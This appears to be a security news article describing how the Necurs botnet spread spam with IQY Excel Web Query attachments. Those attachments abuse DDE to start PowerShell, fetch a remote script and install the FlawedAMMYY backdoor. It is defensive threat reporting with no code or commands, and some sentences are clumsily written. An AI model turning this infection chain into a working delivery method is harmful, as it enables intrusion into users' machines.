Necurs botnet actively attacking since 2017 in various form and cause some of extremely in various countries.
Necurs current distribution utilizing the advanced functionality to evade the Malware detection engine using internet shortcut files.
This year alone Necurs sents more than 230 million dating spam messages that were started in the mid of January 2018 and ended on Feb 3.
Necurs Botnet was mainly used to spreading a Locky Ransomware which is one of the dangerous ransomware in history that infected million of peoples around the World.
Currently, it distributed in IQY file type as an initial infection vector which is basically used to allow users to import data from external sources to the user’s Excel spreadsheet.
“So by Default, Windows recognizes IQY files as MS Excel Web Query Files and automatically executes it in Excel.”
Necurs Botnet Infection Process
Initially, Necurs spreading via spam email along with mail content that refers to sales promotions, offers, and discounts along with IQY file attachment.
Once a user clicks it and executes the file, it pulls out the URL targeted URL into an Excel worksheet.
Pulled data contains a script that can abuse Excel’s Dynamic Data Exchange (DDE) feature, enabling it to execute a command line that begins a PowerShell process which allows to execute the remote powershell script in fileless execution.
According to Trend Micro Report, The PowerShell script enables the download of an executable file, a trojanized remote access application, and its final payload: the backdoor FlawedAMMYY (detected as BKDR_FlawedAMMYY.A). This backdoor appears to have been developed from the leaked source code of the remote administration software called Ammyy Admin.
FlawedAMMYY Backdoor execute the command from a remote malicious server to perform various malicious stealing actvities including File Manager, View Screen, Remote Control, Audio Chat etc.
Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity. Trend Micro said.